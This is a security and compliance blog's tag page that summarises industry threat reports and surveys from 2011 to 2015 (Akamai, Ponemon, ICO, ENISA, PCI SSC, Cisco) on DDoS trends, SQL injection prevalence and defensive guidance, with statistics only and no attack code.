Search

Brian Pennington

A blog about Cyber Security & Compliance

Tag

SQL injection

DDoS attack activity soars

Akamai Technologies, Inc. announced the availability of the Q1 2015 State of the Internet – Security Report. The quarter’s report provides analysis and insight into the global cloud security threat landscape.

DDoS attack activity soars

Q1 2015 set a record for the number of DDoS attacks, as observed across Akamai PLXrouted network, more than double the number recorded in Q1 2014, a jump of more than 35% compared to last quarter.

However, the attack profile has changed. Last year, high bandwidth and short duration attacks were the norm. But in Q1 2015, the typical DDoS attack was less than 10 gigabits per second (Gbps) and endured for more than 24 hours. There were eight mega-attacks in Q1, each exceeding 100 Gbps. While that was one fewer mega-attack than in Q4 2014, such large attacks were rarely seen a year ago. The largest DDoS attack observed in Q1 2015 peaked at 170 Gbps.

During the past year, DDoS attack vectors have also shifted. This quarter, Simple Service Discovery Protocol (SSDP) attacks accounted for more than 20% of the attack vectors, while SSDP attacks were not observed at all in Q1 or Q2 2014. SSDP comes enabled by default on millions of home and office devices including routers, media servers, web cams, smart TVs and printers to allow them to discover each other on a network, establish communication and coordinate activities. If left unsecured and/or misconfigured, these home-based, Internet-connected devices can be harnessed for use as reflectors.

During Q1 2015, the gaming sector was once again hit with more DDoS attacks than any other industry. Gaming has remained the most targeted industry since Q2 2014, consistently being targeted in 35% of DDoS attacks. The software and technology sector was the second most targeted industry in Q1 2015, with 25% of the attacks.

Compared to Q1 2014

  • 5% increase in total DDoS attacks
  • 83% increase in application layer (Layer 7) DDoS attacks
  • 69% increase in infrastructure layer (Layer 3 & 4) DDoS attacks
  • 8% increase in the average attack duration: 24.82 vs. 17.38 hours

Compared to Q4 2014

  • 24% increase in total DDoS attacks
  • 22% increase in application layer (Layer 7) DDoS attacks
  • 74% increase in infrastructure layer (Layer 3 & 4) DDoS attacks
  • 37% decrease in average attack Duration: 24.82 vs. 29.33 hours

A look at seven common web application attack vectors

For the Q1 2015 report, Akamai concentrated its analysis on seven common web application attack vectors, which accounted for 178.85 million web application attacks observed on the Akamai Edge network. These vectors included

  1. SQL injection (SQLi)
  2. Local file inclusion (LFI)
  3. Remote file inclusion (RFI)
  4. PHP injection (PHPi)
  5. Command injection (CMDi)
  6. OGNL Java injection (JAVAi)
  7. Malicious file upload (MFU)

During Q1 2015, more than 66% of the web application attacks were attributed to LFI attacks. This was fueled by a massive campaign against two large retailers in March, targeting the WordPress RevSlider plugin.

SQLi attacks were also quite common, making up more than 29% of web application attacks. A substantial portion of the SQLi attacks was related to attack campaigns against two companies in the travel and hospitality industry. The other five attack vectors collectively made up the remaining five% of attacks.

The retail sector was the hardest hit by web application attacks, followed by the media and entertainment and hotel and travel sectors 

The growing threat of booter/stresser sites

The menu of easy-to-use attack vectors found in the DDoS-for-hire market can make it easy to dismiss the effectiveness of attackers who use them. A year ago, peak attack traffic using these tactics from booter/stresser sites typically measured 10-20 Gbps per second. Now these attack sites have become more dangerous, capable of launching attacks in excess of 100 Gbps. With new reflection attack methods being added continually, such as SSDP, the potential damage from these is expected to continue increasing over time.

IPv6 adoption brings new security risks

IPv6 DDoS is not yet a common occurrence, but there are indications that malicious actors have started testing and researching IPv6 DDoS attack methods. A new set of risks and challenges associated with the transition to IPv6 are already affecting cloud providers as well as home and corporate network owners. Many IPv4 DDoS attacks can be replicated using IPv6 protocols, while some new attack vectors are directly related to the IPv6 architecture. Many of the features of IPv6 could enable attackers to bypass IPv4-based protections, creating a larger and possibly more effective DDoS attack surface. The Q1 security report outlines some of the risks and challenges that are ahead of us.

SQL injection attacks move beyond data theft

While SQL injection attacks have been documented since 1998, their uses have grown. The effects of these malicious queries can extend well beyond simple data exfiltration, potentially causing more damage than a data breach would have. These attacks can be used to elevate privileges, execute commands, infect or corrupt data, deny service, and more. Akamai researchers analyzed more than 8 million SQL injection attacks from Q1 2015 to uncover the most frequent methods and goals.

Website defacements and domain hijacking

Hundreds of web hosting companies provide web hosting for as little as a few dollars a month. In those cases, the hosting company may host multiple accounts on the same server. This can result in hundreds of domains and sites running under the same server IP address, potentially allowing malicious actors to hijack multiple web sites at once. Once one site has been compromised, a malicious actor can potentially traverse the server’s directories, potentially reading username and password lists, to access files from other customer accounts. This could include web site database credentials. With this information, attackers could gain the ability to change files on every site on the server.

65% have experienced an SQL injection attack

The second DB Networks sponsored Ponemon Institute report on the SQL injection threat has been released. 

The report explores what IT security professionals think about the likely attack chain of recent data breaches involving major retailers such as Target, Michaels and Neiman Marcus. The first report focused on how organizations respond to the SQL injection threat and their awareness about different approaches to managing this risk. 

The study surveyed 595 individuals who work in IT and IT security. The majority of respondents are familiar with core IDS technologies that detect rogue SQL statements on the network that connect the web application to the database. 

69% of respondents say their organization must comply with Payment Card Industry Data Security Standard (PCI DSS). As such, a majority of the respondents are very familiar with and required to comply with the security requirements for retailers who accept payment cards. 

SQL injections have been defined as being used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injections exploit security vulnerabilities in an application’s software. SQL injection is most commonly known as an attack vector through public facing websites but can be used to attack SQL databases in a variety of ways.

Background on retail breaches 

Details of the recent retailer network intrusion and data breach haven’t been readily forth coming from either the retailers who were breached or the U.S. Secret Service in charge of the breach investigations. As a result, security professionals are left to piece together the attack chain details based on the nascent amount of information that has been shared thus far. 

Target, for example, has revealed the credentials from an HVAC contractor were compromised. Those compromised credentials they claim initiated the attack chain that ultimately resulted in two major breaches. While certainly an interesting factoid, that information actually offers little insight into the events that ultimately resulted in the breach of 40 million credit cards and another 70 million database records containing personally identifiable information (PII). 

The HVAC vendor credentials only provided access to Target’s vendor billing and invoicing system. It’s a rather long leap from those systems into Target’s POS systems. How that feat was accomplished hasn’t been made public. Further, a report by BusinessWeek revealed that Target’s IT security systems were able to identify the hacker’s suspicious activity multiple times during the attack. But unfortunately those alerts were not agreed upon by Target’s IT security staff. 

Some of the key takeaways from this study include:

  • 50% of respondents believe cyber syndicates are to blame for the large retail data breaches. Only 16% believe an individual perpetrated the attack.
  • Many respondents believe notification of victims is better later than sooner. 36% of respondents would prefer to wait to notify victims until a thorough investigation was conducted.
  • SQL injection threat was one of the components of these retail breaches. 53% of respondents say SQL injections were used to steal sensitive and confidential information.
  • 65% of respondents say continuous monitoring of the database network followed by advanced database activity monitoring are the best approaches to avoiding a mega data breach
  • 33% of respondents say they either scan continuously or daily for active databases. However, 25% scan irregularly and 22% do not scan at all
  • SQL injection was considered by respondents to be one of the components of these attacks. 57% (36% + 21%) of respondents believe the likelihood that the attacks against the U.S. retailers involved SQL injection was 51% or greater
  • 65% of organizations represented in this study experienced a SQL injection attack that successfully evaded their perimeter defences in the last 12 months.
  • 49% say the SQL injection threat facing their company is very significant. On average, respondents believe 42% of all data breaches are due, at least in part, to SQL injections.
  • Many organizations are not familiar with the techniques used by cyber criminals.
  • 46% are familiar with the term Web Application Firewalls (WAF) bypass
  • 39% of respondents are very familiar or familiar with the techniques cybercriminal use to get around WAF perimeter security devices
  • BYOD makes understanding the root causes of an SQL injection threat more difficult. 56% of respondents say determining the root causes of SQL injection is becoming more difficult because of employees’ use of personally owned mobile devices (BYOD) in the workplace. Another challenge, according to 41% of respondents, is increasing stealth and/or sophistication of cyber attackers
  • Expertise and the right technologies are critical to preventing the SQL injection threat. While respondents see the SQL threat as serious, only 31% say their organization’s IT security personnel possess the skills, knowledge and expertise to quickly detect SQL injection threats and 34% agree that they have the technologies or tools to quickly detect a SQL injection threat 

Find the report here

8 areas of computer security that have arisen during Data Breach investigations

The UK Information Commissioner’s Office (ICO) has identified eight important areas of computer security that have frequently arisen during their investigations of data breaches.

The eight areas are:-

  1. Software updates
  2. SQL injection (65% of organisations have been breached by a SQL Injection attack)
  3. Unnecessary services
  4. Decommissioning of software or services
  5. Password storage
  6. Configuration of SSL and TLS
  7. Inappropriate locations for processing data
  8. Default credentials

The ICO has provided advice for all eight areas. The report can be found here.

65% of organisations have been breached by a SQL Injection attack

Ponemon Institute have released their The SQL Injection Threat Study sponsored by DB Networks. The purpose of the research was to understand how organisations respond to the SQL injection threat and their awareness about different approaches to managing this risk.

The study surveyed 595 individuals who work in IT and IT security. The majority of respondents were familiar with core IDS technologies that detect rogue SQL statements on the network that connect the web application to the database.

SQL injections are defined as:-

being used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injections exploit security vulnerabilities in an application’s software. SQL injection is most commonly known as an attack vector through public facing websites but can be used to attack SQL databases in a variety of ways

Key findings extracted from the report:-

  • The SQL threat is taken seriously because 65% of organizations represented in this study experienced a SQL injection attack that successfully evaded their perimeter defences in the last 12 months.
  • 49% of respondents say the SQL injection threat facing their company is very significant. On average, respondents believe 42% of all data breaches are due, at least in part, to SQL injections.
  • Many organizations are not familiar with the techniques used by cyber criminals. 46% of respondents are familiar with the term Web Application Firewalls (WAF) bypass. Only 39% of respondents are very familiar or familiar with the techniques cyber criminal use to get around WAF perimeter security devices.
  • BYOD makes understanding the root causes of an SQL injection attack more difficult. 56% of respondents say determining the root causes of SQL injection is becoming more difficult because of the trend for employees to use their personally owned mobile devices (BYOD) in the workplace. Another challenge, according to 41% of respondents, is increasing stealth and/or sophistication of cyber attackers.
  • Expertise and the right technologies are critical to preventing SQL injection attacks. While respondents see the SQL threat as serious, only 31% say their organization’s IT security personnel possess the skills, knowledge and expertise to quickly detect a SQL injection attack and 34% agree that they have the technologies or tools to quickly detect a SQL injection attack.
  • Measures to prevent SQL injection attacks are also lacking. Despite concerns about the threat, 52% do not take such precautions as testing and validating third party software to ensure it is not vulnerable to SQL injection attack.
  • Organizations move to a behavioural analysis solution to combat the SQL injection threat. 88% of respondents view behavioural analysis either very favourably or favourably.
  • 44% of respondents say their organization uses professional penetration testers to identify vulnerabilities in their information systems but only 35% of these organizations include testing for SQL injection vulnerabilities.
  • 20% continuously scan active databases, 13% do it daily, 25% scan irregularly and 22% do not scan at all.

The full report can be found here.



Europe’s Threat Landscape 2013 a report by ENISA

The EU’s cyber security Agency ENISA has issued its annual Threat Landscape 2013 report, where over 200 publicly available reports and articles have been analysed. 

Questions addressed are:

  • What are the top cyber-threats of 2013?
  • Who are the adversaries?
  • What are the important cyber-threat trends in the digital ecosystem?

Among the key findings is that cyber threats have gone mobile, and that adoption of simple security measures by end-users would reduce the number of cyber incidents worldwide by 50%.

The ENISA Threat Landscape presents the top current cyber threats of 2013 and identifies emerging trends. In 2013 important news stories news, significant changes and remarkable successes have left their footprint in the cyber-threat landscape. Both negative and positive developments have formed the 2013 threat landscape. In particular:

Negative trends 2013:

  • Threat agents have increased the sophistication of their attacks and of their tools.
  • Clearly, cyber activities are not a matter of only a handful of nation states; indeed multiple states have developed the capacity to infiltrate both governmental and private targets.
  • Cyber-threats go mobile: attack patterns and tools targeting PCs which were developed a few years ago have now migrated to the mobile ecosystem.
  • Two new digital battlefields have emerged: Big Data and the Internet of Things.

Positive developments in the cyber threat trends in 2013 include:

  • Some impressive law-enforcement successes. Police arrested the gang responsible for the Police Virus; the Silk Road operator as well as the developer and operator of Blackhole, the most popular exploit kit, were also arrested.
  • Both the quality and number of reports as well as the data regarding cyber-threats have increased
  • Vendors gained speed in patching their products in response to new vulnerabilities.

The top three threats:

  1. Drive-by-downloads
  2. Worms/Trojans
  3. Code injections.

Key open issues, identified are:

  • The end-users lack knowledge yet they need to be actively involved. Adoption of simple security measures by end-users would reduce the number of cyber incidents for 50% worldwide!
  • Numerous actors work on overlapping issues of threat information collection and threat analysis. Greater coordination of information collection, analysis, assessment and validation among involved organisations is necessary.
  • The importance of increasing the speed of threat assessment and dissemination, by reducing detection and assessment cycles has been identified.

The Executive Director of ENISA, Professor Udo Helmbrecht remarked: “This threat analysis presents indispensable information for the cyber security community regarding the top threats in cyber-space, the trends, and how adversaries are setting up their attacks by using these threats.”

The full report can be found here.

.

PCI SSC releases its PCI DSS E-commerce Security Guidelines

Hot on the heels of the ATM Guidelines the PCI SSC has released the PCI DSS E-commerce Guidelines Information Supplement. 

The guidelines are designed to help e-commerce merchants to decide on which technologies and third party service providers to choose.

The e-commerce Special Interest Groups (SIGs) helped put the guidelines together and that meant using their knowledge of the marketplace to produce an industry specific document. 

Take SQL injections as an example. This is not a new attack, and something we’ve known about in the industry for years. Yet it continues to be one of the most common methods by which e-commerce websites are compromised, said Bob Russo, general manager, PCI Security Standards Council. “This can be addressed through simple, prudent coding practices, but merchants often don’t know where to start. These guidelines will help them better understand their responsibilities and the kinds of questions they need to ask of their service providers. In the case of SQL injections, one of the most important items to request of an e-commerce service provider is a description of the security controls and methods it has in place to protect websites against these vulnerabilities.

The PCI DSS E-commerce Guidelines Information Supplement provides an introduction to e-commerce security and guidance around the following primary areas and objectives: 

  • E-commerce Overview – provides merchants and third parties with explanation of typical e-commerce components and common implementations and outlines high-level PCI DSS scoping guidance to be considered for each.
  •  Common Vulnerabilities in E-commerce Environments – educates merchants on vulnerabilities often found in web applications (such as e-commerce shopping carts) so they can emphasize security when developing or choosing e-commerce software and services.
  • Recommendations – provides merchants with best practices to secure their e-commerce environments, as well as list of recommended industry and PCI SSC resources to leverage in e-commerce security efforts.

 The document also includes two appendices to address specific PCI DSS requirements and implementation scenarios:

  1. PCI DSS Guidance for E-commerce Environments – provides high-level e-commerce guidance that corresponds to the main categories of PCI DSS requirements; includes chart to help organizations identify and document which PCI DSS responsibilities are those of the merchant and which are the responsibility of any e-commerce payment processor.
  2.  Merchant and Third-Party PCI DSS Responsibilities – for outsourced or “hybrid” e-commerce environments, includes sample checklist that merchants can use to identify which party is responsible for compliance and specify the details on the evidence of compliance.

E-commerce continues to be a target for attacks on card data, especially with EMV technology helping drive so much of the face-to-face fraud down in Europe and other parts of the world, said Jeremy King, European director, PCI Security Standards Council. “We are pleased with this guidance that will help merchants and others better understand how to secure this critical environment using the PCI Standards.

For a link to the full document please use my PCI Resources page here.

Global Threat Report Quarter 1 2011

Image representing Cisco as depicted in CrunchBase
Image via CrunchBase

The Cisco Quarter 1 2011 Global Threat Report has been released. The Cisco Global Threat Report is a compilation of data collected across the four segments of Cisco Security: ScanSafe, IPS, RMS and IronPort.

The highlights for Quarter 1 2011 include:-.

  • 105,536 unique Web malware were encountered in March 2011, a 46% increase from January 2011
  • Malicious webmail represented 7% of all Web-delivered malware in March 2011, a 391% increase from January 2011
  • 45% of all malicious webmail resulted from Yahoo! mail, 25% from Microsoft Live/Hotmail, and only 2% from Google’s Gmail
  • Search-engine-related traffic resulted in an average of 9% of all Web malware encountered in 1Q11
  • 33% of search engine encounters were via Google search engine results pages (SERPs), with 4% each from Yahoo! and Bing SERPs
  • SERPs and webmail encounters are impacted by the popularity of a particular service and are likely not indicative of any heightened risk specific to that service
  • Likejacking increased significantly during the first quarter of 2011, from 0.54% of all Web malware encounters in January 2011 to 6% in March 2011
  • At 13%, Miley Cyrus–themed likejacking scams beat out all other celebrities and events in March 2011. Likejacking themes for Indian actress Nayantara were at 7%, while Charlie Sheen was at 3%, Justin Bieber at 2%, and Lady Gaga at 1%
  • At 4% of all Web malware encounters in 1Q11, website compromises that attempted to download the Hiloti Trojan were the most frequently encountered, followed by malicious GIF injections (3%). Website compromises related to the Lizamoon series of SQL injection attacks represented just 0.15% of Web malware encounters for the quarter
  • Though far less successful than in years past, SQL injection attempts continued to be the most prevalent event firing (55%) observed by Cisco Remote Management Services in 1Q11
  • Malware activity related to the MyDoom worm was the 10th most frequently RMS-observed IPS event in 1Q11, demonstrating that legacy malware can still pose a threat to unprotected systems
  • As expected, Rustock activity declined significantly over 1Q11, but, interestingly, the sharp decline commenced weeks prior to the botnet takedown
  • Following 4Q10 declines, global spam volume increased and then subsequently decreased during 1Q11, but levels remained above that of December 2010
  • With an increase of 248%, Indonesia overtook the United States as the top spam-sending country in 1Q11
Cisco’s Top 10 Signature Findings Q1 2011  
Generic SQL Injection 55.03%
Web View Script Injection Vulnerability 7.01%
Gbot Command and Control Over HTTP 5.16%
B02K-UDP 5.20%
Cisco Unified Videoconferencing Remote Command Injection 4.91%
Microsoft Internet Explorer Invalid Flag Reference Remote Code Execution 3.27%
Windows MHTML Protocol Handler Script Execution 2.47%
WWW WinNT cmd.exe Access 1.30%
Web Application Security Test/Attack 1.19%
MyDoom Virus Activity 1.16%

Note that the MHTML vulnerability described in Microsoft KB 2501696, IntelliShield alert 22310, and Cisco Intrusion Prevention System (IPS) 6.0 – 33379/0 also appears on the Cisco RMS top 10 signature events list for 1Q11. Microsoft released an update for this former zero-day vulnerability in April 2011 (MS11-026).

While a significantly occurring event in 1Q11, SQL injection attempts remained at a fairly steady pace throughout the quarter with the only notable increase occurring in the latter part of March 2011.

Cisco RMS Top 10 by Port Activity
Port  Percentage
80 69%
40436 2.23%
25 2.17%
161 1.39%
5060 1.27%
123 1.16%
34227 1.13%
443 1.05%
21 1.00%
20 0.71%

Although they represent a relatively small percentage of overall spam, phishing attacks pose a serious risk to security, both from a financial and sensitive information disclosure perspective. In 1Q11, attackers increasingly turned their attention toward phishing Twitter accounts.

This interest in Twitter credentials is likely due in part to Twitter users’ acceptance of shortened URLs. By compromising Twitter accounts, attackers can take advantage of shortened URLs to entice followers to visit malicious links the users might ordinarily view as suspicious. Such attacks are further fuelled by the trust engendered through social networking in general.

The report can be downloaded here

.

Eight must-fix flaws prior to an application penetration test

An excellent article by Neil O’Connor for SearchSecurity.

 The full article is HERE but Neil’s Eight must fix flaws are listed below:-

 1.         Trusting client-side validation

2.         Blacklisting for input validation

3.         Improper error handling

4.         Forgotten/change password functionality

5.         Unencrypted communications/authentication

6.         Lack of auditing and logging

7.         Not reusing good security API or already tested code

8.         Not following Microsoft best practice development guides

For PCI DSS the guidance for requirement 6.6 is:-

Attacks on web-facing applications are common and often successful, and are allowed by poor coding practices. This requirement for reviewing applications or installing web application firewalls is intended to greatly reduce the number of compromises on public facing web applications that result in breaches of cardholder data.

  • Manual or automated vulnerability security assessment tools or methods that review and/or scan for application vulnerabilities can be used to satisfy this requirement

 

  • Web-application firewalls filter and block non-essential traffic at the application layer. Used in conjunction with a network-based firewall, a properly configured web-application firewall prevents application-layer attacks if applications are improperly coded or configured.

Create a free website or blog at WordPress.com.

Up ↑

%d bloggers like this: